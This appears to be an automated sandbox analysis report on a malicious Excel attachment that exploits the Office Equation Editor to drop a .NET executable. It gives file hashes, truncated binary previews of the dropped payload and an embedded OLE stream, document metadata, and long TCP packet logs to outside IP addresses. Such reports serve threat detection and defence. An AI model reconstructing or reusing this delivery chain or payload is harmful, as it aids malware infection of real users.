                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.b.l.e.m.S.i.g.n.a.t.u.

                                C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe

                                Download File
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):8704
                                Entropy (8bit):4.812551859843081
                                Encrypted:false
                                SSDEEP:96:5PM1Y6CB0C0st2AbUCAb17mF3lIpDXHo2rbwCiCeQhULtgAwsMIkGTp9rQEkrGi4:SAT0st2MUQIN42rSCekUL+VtvC
                                MD5:6D370555D43F89189867FD72222C6059
                                SHA1:79505977A7B45050A45BC4B715B21DF8F49AA3F1
                                SHA-256:41BF0E9B141CB3541CE14CA9DE7F606FD30C20E02CE95936F41FB728BD6C2232
                                SHA-512:48A97F522BD2DDD2704093917B4E19DC48726F650FD0DB496EE6D6BEE7CDD87CE089ADC8076EF1BD8D1401B100D81A50D2025AF8C061955DD740BA01056AC5EC
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.............................7... ...@....@.. ....................................@..................................7..W....@.......................`......L6............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H.......|"...............................................................0..........s........o.....Y................0Yr...p...o....(....(.......o....(....jai(....(.........o....&...o.....Y3....+....X....X.+..o....*...0...........(....s......(.....#........(.... ....(....r...pr...p(.....r...pr...p(.......o....(................r4..p....~..........o..........r...p...........r...p...(....o ...r...p...........r*..p...(.... ........t....o!...&.("......,..o#....*................Z(%.

                                C:\Users\user\Desktop\~$Contract - Wipak Oy.xlsx

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                Malicious:true
                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                Static File Info

                                General

                                File type:Microsoft Excel 2007+
                                Entropy (8bit):7.99738280724659
                                TrID:
                                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                • ZIP compressed archive (8000/1) 16.67%
                                File name:Contract - Wipak Oy.xlsx
                                File size:2819080
                                MD5:d0cd467a481799f5dc06a498e24ff4ad
                                SHA1:da919b490b8192eab7c577b4a85337d09eb56a9e
                                SHA256:831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c
                                SHA512:deefc6c8b76de5f8cd1ed1f7541d136961d6f249a16abc4c6cac7114ac55facc3c0d3f5c5b581dabd18bb71468351bb28039d2ff533aaa634240e8587f0ac545
                                SSDEEP:49152:4yFhEeXk7Vs4O7VhPiiw176tK5fpiB+VkAT5H0T9DpZvlfp+INtJz:4uXmijhhPDwNgiBiBuTG1lx+IN3
                                TLSH:DCD53396C4F0AB688E9F1585EEAF7840472FBAC1E1DF8496D054047C37AB19DF222D4E
                                File Content Preview:PK........"J.U................[Content_Types].xmlUT......b...b...b.U[k.0.~/.?...XI.e.q.[.....B.(K'....N.....nZ(.Yp./.-...O.....b.1i.*6*...'..nQ.....WV$.N...Tl...L....... .K.[".o.'..+R..8...h..g\. .J,._..W\z..p...M..0.k.....['.-X.../KUL....|2~ .Q+(."./ai.o

                                File Icon

                                Icon Hash:e4e2aa8aa4b4bcb4

                                Static OLE Info

                                General

                                Document Type:OpenXML
                                Number of OLE Files:1

                                OLE File "/opt/package/joesandbox/database/analysis/679189/sample/Contract - Wipak Oy.xlsx"

                                Indicators
                                Has Summary Info:
                                Application Name:
                                Encrypted Document:False
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:False
                                Flash Objects Count:0
                                Contains VBA Macros:False
                                Summary
                                Author:Marcus Egharevba
                                Last Saved By:Marcus Egharevba
                                Create Time:2022-07-26T22:32:06Z
                                Last Saved Time:2022-07-27T02:01:40Z
                                Creating Application:Microsoft Excel
                                Security:0
                                Document Summary
                                Thumbnail Scaling Desired:false
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:12.0000

                                Streams

                                Stream Path: \x1oLE10nATivE, File Type: data, Stream Size: 3008016
                                General
                                Stream Path:\x1oLE10nATivE
                                File Type:data
                                Stream Size:3008016
                                Entropy:7.830311072494768
                                Base64 Encoded:True
                                Data ASCII:_ . . . l . . . M & n 5 . + . . 1 . 5 ] . . V . . - ` B . . . ` h . X . c e s $ o A u 2 V % _ 5 3 Z ( . , p y K * . Y { . v . , 6 T 7 < Y k . . t o ` \\ . . z S , ( ^ x N b R t . 5 2 f t . $ = J + b I d u = ] U . . g = 7 . . ^ G . . * . 7 e F . . . L k - - . i . 2 N . Y . . ) x _ < . 4 W I s H E , / = h . . w i g . j . c C ^ . . d . : e 6 & l . $ y . / . . . x c . c ' . 5 W { . - ; U 5 % . 5 9 . J e 6 . . . j . 5 . m . . ( _ F E . D W R 7 8 i . l 4 \\ Q ^ . l Y . w ^ S m @ O . , z Q C . N N o . . . ] . +
                                Data Raw:8e 5f d9 05 02 80 16 6c 0c 9b 01 08 4d ed b8 ff 26 6e c4 35 c3 9b 2b c4 8b 08 8b 31 bb e5 fb a3 19 81 eb 35 94 5d 19 8b 1b 56 ff d3 05 f8 81 0a c3 2d c5 f7 e9 c2 ff e0 fe bd 88 60 42 00 19 1e 60 c5 d8 68 14 58 17 85 63 b3 a7 80 d3 f3 ca 65 e9 d3 73 f9 24 6f 41 75 32 56 25 5f e5 35 f5 94 a6 84 33 5a a0 28 04 2c d1 70 79 a3 4b 2a ab 9b 1f ef 59 f5 7b cf 04 a8 e0 76 aa fd d6 81 2c 8b
                                Stream Path: vd4Gf9eRaIg9JoI2jb8EGtk, File Type: empty, Stream Size: 0
                                General
                                Stream Path:vd4Gf9eRaIg9JoI2jb8EGtk
                                File Type:empty
                                Stream Size:0
                                Entropy:0.0
                                Base64 Encoded:False
                                Data ASCII:
                                Data Raw:

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 5, 2022 11:41:32.266644955 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.266717911 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.266779900 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.311975002 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.312050104 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.381227970 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.381334066 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.398665905 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.398714066 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.399238110 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.399341106 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.798109055 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.827157974 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.827245951 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.827311039 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.827317953 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.827363968 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.827392101 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.827405930 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.827415943 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.827429056 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.827450037 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.827483892 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.827498913 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.893266916 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.893310070 CEST44349171136.243.86.20192.168.2.22
                                Aug 5, 2022 11:41:32.893321037 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:32.893373966 CEST49171443192.168.2.22136.243.86.20
                                Aug 5, 2022 11:41:35.534665108 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:35.534696102 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:35.534765005 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:35.546125889 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:35.546150923 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:35.610106945 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:35.610213995 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:35.623195887 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:35.623214006 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:35.623613119 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:35.831306934 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.144934893 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.190440893 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.190653086 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.190764904 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.190830946 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.190875053 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191015959 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.191032887 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191138029 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191231012 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191318989 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191329956 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.191355944 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191559076 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.191577911 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191670895 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191760063 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191843033 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.191850901 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191874027 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.191955090 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.191977978 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192214966 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192300081 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192328930 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.192354918 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192461967 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192549944 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.192559958 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192580938 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192655087 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.192713976 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192878962 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.192970037 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193048000 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.193067074 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193212986 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193304062 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.193324089 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193495989 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193564892 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.193582058 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193702936 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193767071 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.193780899 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193897963 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.193990946 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.194010019 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194133043 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194205999 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.194224119 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194319010 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194386005 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.194402933 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194502115 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194567919 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.194585085 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194766998 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194833040 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.194850922 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.194998026 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.195067883 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.195086956 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.198399067 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.199049950 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.207192898 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.207351923 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.207530975 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.207638979 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.207717896 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.207726002 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.207746029 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.207792997 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.209011078 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.209103107 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.209121943 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.209144115 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.209201097 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.209211111 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.209243059 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.209299088 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.209311962 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.209327936 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.209430933 CEST44349172162.159.129.233192.168.2.22
                                Aug 5, 2022 11:41:36.209489107 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.212106943 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.212137938 CEST49172443192.168.2.22162.159.129.233
                                Aug 5, 2022 11:41:36.220988989 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.249169111 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.249311924 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.249592066 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.279833078 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.279875040 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.279906034 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.279937029 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.279968023 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.279998064 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.280029058 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.280057907 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.280054092 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.280088902 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.280095100 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.280119896 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.280139923 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.308034897 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308067083 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308087111 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308109999 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308130026 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308146954 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308166027 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308187008 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308202982 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.308208942 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308238983 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308248043 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.308262110 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308279991 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.308285952 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308306932 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308310986 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.308327913 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308348894 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308358908 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.308372021 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308393002 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308403969 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.308414936 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.308434963 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.336707115 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.336781979 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.336844921 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.336903095 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.336905956 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.336962938 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337030888 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337071896 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.337090015 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337150097 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337201118 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337243080 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.337260008 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337327003 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337389946 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.337390900 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337435961 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337497950 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.337497950 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337560892 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337615013 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337615967 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.337660074 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337698936 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337718010 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.337740898 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337785006 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337821007 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.337826014 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337867022 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337907076 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337944031 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.337990046 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338002920 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.338010073 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.338030100 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338068962 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338109970 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338149071 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338188887 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338190079 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.338202000 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.338229895 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338268042 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338309050 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338347912 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338387966 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338391066 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.338397980 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.338428974 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.338468075 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366206884 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366244078 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366270065 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366291046 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366307974 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366307974 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366333961 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366358042 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366360903 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366380930 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366390944 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366408110 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366415977 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366430998 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366453886 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366465092 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366480112 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366506100 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366528034 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366532087 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366552114 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366575956 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366597891 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366611958 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366621017 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366643906 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.366657019 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366666079 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.366677046 CEST8049173109.206.241.81192.168.2.22
